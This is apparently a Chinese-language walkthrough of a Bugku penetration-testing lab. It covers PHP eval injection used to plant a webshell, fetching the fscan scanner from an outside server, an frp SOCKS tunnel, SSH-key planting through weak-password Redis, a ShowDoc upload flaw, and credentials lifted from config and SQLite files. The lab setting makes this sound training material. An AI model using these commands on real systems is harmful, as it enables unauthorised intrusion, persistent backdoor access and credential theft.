Bugku渗透4打靶记录

入口机器

测试了弱口令、SQLi、目录扫描都无果，nmap结果，ssh也不是弱口令

nmap -sV -sC -Pn -p- 139.224.162.206
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-27 21:22 +0800
Nmap scan report for 139.224.162.206
Host is up (0.029s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: \xE8\xBF\x90\xE7\xBB\xB4\xE7\xB3\xBB\xE7\xBB\x9F\xE7\x99\xBB\xE5\xBD\x95
|_http-server-header: Apache/2.4.54 (Debian)
22000/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 50:13:5f:50:2d:49:a4:19:37:68:5b:bc:dd:63:dd:e1 (RSA)
|   256 3d:36:a4:37:a8:b1:70:44:a3:11:ef:00:75:cc:cc:36 (ECDSA)
|_  256 7f:fa:ae:05:75:1c:dd:93:c4:89:30:93:2d:80:6e:f8 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.46 seconds

fuzz的时候改变action参数发现报错，

1. ajax.php 第 22 行有 eval() 函数
2. 你发送的参数中包含了 df() 这个函数调用
3. 因为 df() 不存在，所以报错

那么这里可以执行任意php代码：中途断了一次机器所以IP对不上

POST /ajax.php HTTP/1.1
Host: 139.224.162.206

action=phpinfo()&username=admin&password=123456

没有问题，尝试写入webshell：

curl -X POST 'http://139.224.162.206/ajax.php' -d 'action=file_put_contents("404.php","<?php%20@eval(\$_POST[pass]);?>")&username=admin&password=123'

找到flag1：flag{3c606558c25edf5725b8e1c7ae7bdd3d}

root目录下还有一个flag，尝试提权：

web里面提权有时候不太好用，先反弹一个shell上来继续尝试。suid看过没有能用的，Linpeas收集到的如下：

CVE: CVE-2014-0038 | Name: timeoutpwn | Match data: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y | Tags: ubuntu=13.10 | Rank: 1 | Details: CONFIG_X86_X32 needs to be enabled
CVE: CVE-2014-0038 | Name: timeoutpwn 2 | Match data: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y | Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic} | Rank: 1 | Details: CONFIG_X86_X32 needs to be enabled
CVE: CVE-2014-0196 | Name: rawmodePTY | Match data: pkg=linux-kernel,ver>=2.6.31,ver<=3.14.3 | Tags: 1
CVE: CVE-2014-2851 | Name: use-after-free in ping_init_sock() (DoS) | Match data: pkg=linux-kernel,ver>=3.0.1,ver<=3.14 | Tags: 0
CVE: CVE-2014-4014 | Name: inode_capable | Match data: pkg=linux-kernel,ver>=3.0.1,ver<=3.13 | Tags: ubuntu=12.04 | Rank: 1
CVE: CVE-2014-4943 | Name: PPPoL2TP (DoS) | Match data: pkg=linux-kernel,ver>=3.2,ver<=3.15.6 | Tags: 1
CVE: CVE-2014-5207 | Name: fuse_suid | Match data: pkg=linux-kernel,ver>=3.0.1,ver<=3.16.1 | Tags: 1
CVE: CVE-2015-9322 | Name: BadIRET | Match data: pkg=linux-kernel,ver>=3.0.1,ver<3.17.5,x86_64 | Tags: RHEL<=7,fedora=20 | Rank: 1
CVE: CVE-2015-8660 | Name: overlayfs (ovl_setattr) | Match data: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3 | Tags: 1
CVE: CVE-2015-8660 | Name: overlayfs (ovl_setattr) | Match data: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3 | Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic} | Rank: 1
CVE: CVE-2016-0728 | Name: keyring | Match data: pkg=linux-kernel,ver>=3.10,ver<4.4.1 | Tags: 0 | Rank: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
CVE: CVE-2016-2384 | Name: usb-midi | Match data: pkg=linux-kernel,ver>=3.0.0,ver<=4.4.8 | Tags: ubuntu=14.04,fedora=22 | Rank: 1 | Details: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
CVE: CVE-2016-5195 | Name: dirtycow | Match data: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3 | Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04 | Rank: 4 | Details: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
CVE: CVE-2016-5195 | Name: dirtycow 2 | Match data: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3 | Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} | Rank: 4 | Details: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
CVE: CVE-2017-6074 | Name: dccp | Match data: pkg=linux-kernel,ver>=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my] | Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} | Rank: 1 | Details: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
CVE: CVE-2017-7308 | Name: af_packet | Match data: pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 | Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} | Rank: 1 | Details: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
CVE: CVE-2017-1000253 | Name: PIE_stack_corruption | Match data: pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64 | Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1} | Rank: 1
CVE: CVE-2019-15666 | Name: XFRM_UAF | Match data: pkg=linux-kernel,ver>=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y | Tags: 1 | Rank: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
CVE: CVE-2021-27365 | Name: linux-iscsi | Match data: pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y | Tags: RHEL=8 | Rank: 1 | Details: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
CVE: CVE-2021-22555 | Name: Netfilter heap out-of-bounds write | Match data: pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6 | Tags: ubuntu=20.04{kernel:5.8.0-*} | Rank: 1 | Details: ip_tables kernel module must be loaded
CVE: CVE-2022-32250 | Name: nft_object UAF (NFT_MSG_NEWSET) | Match data: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 | Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} | Rank: 1 | Details: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
CVE: CVE-2018-14665 | Name: exploit_x | Match data: 2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6,3.8.0,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.14.0,3.15.0,3.16.0,3.17.0,3.18.0,3.19.0,4.0.0,4.1.0,4.2.0,4.3.0,4.4.0,4.5.0,4.6.0,4.7.0 | Tags: 1 | Rank: http://www.exploit-db.com/exploits/45697
CVE: CVE-2016-0728 | Name: pp_key | Match data: 3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.1,3.8.2,3.8.3,3.8.4,3.8.5,3.8.6,3.8.7,3.8.8,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1 | Tags: http://www.exploit-db.com/exploits/39277
CVE: CVE-2014-0038 | Name: timeoutpwn | Match data: 3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.9,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.5,3.8.6,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1 | Tags: http://www.exploit-db.com/exploits/31346

可能的都试过了，居然没有一个能打的。先放弃了。。。

192.168.0.202

传fscan扫一下内网

curl -O http://47.93.254.31:48888/fscan_2.1.3_linux_x64
./fscan -h 192.168.0.0/24 -o result.txt -np

发现有redis弱口令，依旧是内网代理frp：

serverAddr = "x.x.x.x"
serverPort = 47000

[[proxies]]
name = "socks"
type = "tcp"
remotePort = 6666

[proxies.plugin]
type = "socks5"

挂proxychains打redis公钥写入：

先生成公钥对，然后将公钥写入1.txt，接着通过缓存打到redis，再进入redis里面写入公钥，ssh连接拿下redis主机，得到flag2

proxychains4 -q cat ./1.txt | proxychains4 -q redis-cli -h 192.168.0.202 -a 123456 -x set crackit
proxychains4 -q redis-cli -h 192.168.0.202 -a 123456
:6379> config set dir /root/.ssh/
OK
:6379> config set dbfilename authorized_keys
OK
:6379> save
OK
:6379> exit
# 这里22端口连接不上，直接猜测22000，因为入口机器Nmap扫出来是这个
proxychains4 -q ssh -i ~/.ssh/id_rsa_bkdoor root@192.168.0.202 -p 22000

本来想着是不是私钥复用，结果root目录下的Note.md里面有提示给出了密码：

echo "Dev@Bug_C00l123" | passwd --stdin root

看样子像是入口机器的密码，因为是运维，登陆入口机器，在/root下面拿到flag3:flag{c34467603f306fe28566d79428e40903}。原来不用提权。

172.16.0.153

在redis那台机器上跑一下linpeas.sh，然后拿到网络信息：172.16.0.0/24

fscan -h 172.16.0.0/24 -np扫一下另一张网卡上的内容：发现有一个未知主机172.16.0.153

在redis机器搭建新的frp隧道，发现172.16.0.153是showdoc搭建的一个平台，搜索历史漏洞，有前台文件上传

得到上传文件路径然后连接，得到flag4

同样find: '/root': Permission denied，也要提权。测试了常规提权和exp都不行，估计这几台机器都是打过补丁的，应该思路不是这里，继续收集信息。找一下网站配置文件、数据库之类的。

/var/www/html/server/Application/Common/Conf/config.php内容：

<?php
return array(
    //'配置项'=>'配置值'
    //使用sqlite数据库
    'DB_TYPE'   => 'Sqlite', 
    'DB_NAME'   => '../Sqlite/showdoc.db.php', 
    //showdoc不再支持mysql http://www.showdoc.cc/help?page_id=31990
    'DB_HOST'   => 'localhost',
    'DB_USER'   => 'showdoc', 
    'DB_PWD'    => 'showdoc123456',
    'DB_PORT'   => 3306, // 端口
    'DB_PREFIX' => '', // 数据库表前缀
    'DB_CHARSET'=> 'utf8', // 字符集
    'DB_DEBUG'  =>  TRUE, // 数据库调试模式 开启后可以记录SQL日志
    'URL_HTML_SUFFIX' => '',//url伪静态后缀
    'URL_MODEL' => 3 ,//URL兼容模式
    'URL_ROUTER_ON'   => true, 
    'URL_ROUTE_RULES'=>array(

showdoc.db.php 是 ShowDoc 在线文档工具的 SQLite 数据库文件，用在线https://inloop.github.io/sqlite-viewer/网站查看数据库内容：有个`devteam/f2ef774f5af471562035a1847f307afc`账户，但是密码是md5，去查一下能不能明文，可惜没查到。

不过还有user_token表：

按照源码在cookie里面带上cookie_token=5b531b30bd77182266fde38a03d51579330d77c12fdc5a76f2524becb9905482。不知道为什么还是登陆不上，翻翻数据库内容，在page表里面发现了测试账密root/Test@1234.

拿到最后一个flag5:flag{70c40123ca473e673b2afe89e72b0dc6}

总结

入口机器命令执行trick -> 内网Redis公钥打法 -> showdoc文件上传 -> sqlite数据库解析

考察对密码的信息收集。还有提权那部分比较折腾，花了时间都没用。